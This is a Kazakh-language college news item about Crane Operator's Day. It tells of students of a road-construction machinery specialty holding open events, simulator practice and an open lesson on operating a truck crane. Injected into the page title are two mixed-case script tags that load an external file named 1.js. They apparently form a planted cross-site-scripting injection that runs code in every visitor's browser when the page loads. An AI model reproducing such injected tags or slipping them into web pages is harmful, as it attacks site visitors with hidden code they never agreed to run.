Кран машинисінің күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.06.2019

4 маусым күні «Жол-құрылыс машиналарын техникалық пайдалану» мамандығының студенттері кәсіби мерекесін атап өтті.  Бұл күні колледжде кранның болашақ машинистеріне арналған ашық іс-шаралар өтті, автомобиль кранын басқару бойынша жоғары курс студенттерінің шеберлік сыныбы өткізілді. 1-АК-18 және 2-АК-17 топтарының студенттері үшін біліктілік бойынша – автомобиль кранының машинисі, СМК-7 базасында оқу тренажерында, 2-АК-17 гуппасының студенттері ө/о шебері Д. М. Аимбетовтың және арнайы пәндер оқытушысы О. Т. Касеновтың жетекшілігімен презентация көрсетілді. Алғашқы дағдылар, кранды басқару көрсетілді.

Студенттер келесі жаттығуларды орындады:

* кран орнатылатын алаңның жағдайын бақылау;

* арнайы құжаттармен алдын ала танысу, еңбекті қорғау және қауіпсіздік техникасы мәселелері;

* жебені көтеру, жебені бұру, ілмекті көтеру, тіркеме және жүкті көтеру;

* ілмектеуші жүргізетін сигнал бойынша жүктерді тасымалдау;

Касенов О. Т. 2АК-17 тобының студенттерімен «Автомобиль кранын пайдалану» тақырыбында ашық сабақ өткізді.

Бұл мереке колледж студенттерінің есінде ұзақ қалады! Сіздің мамандығыңыз өте жауапты, сіздерге сәттілік тілейміз, мерекелеріңізбен!

Сатанова А.Б.

Аударған: Аубакирова Ф.К.

Просмотров: 628


Пікір қосу



Деректерді қолтаңбаға қосу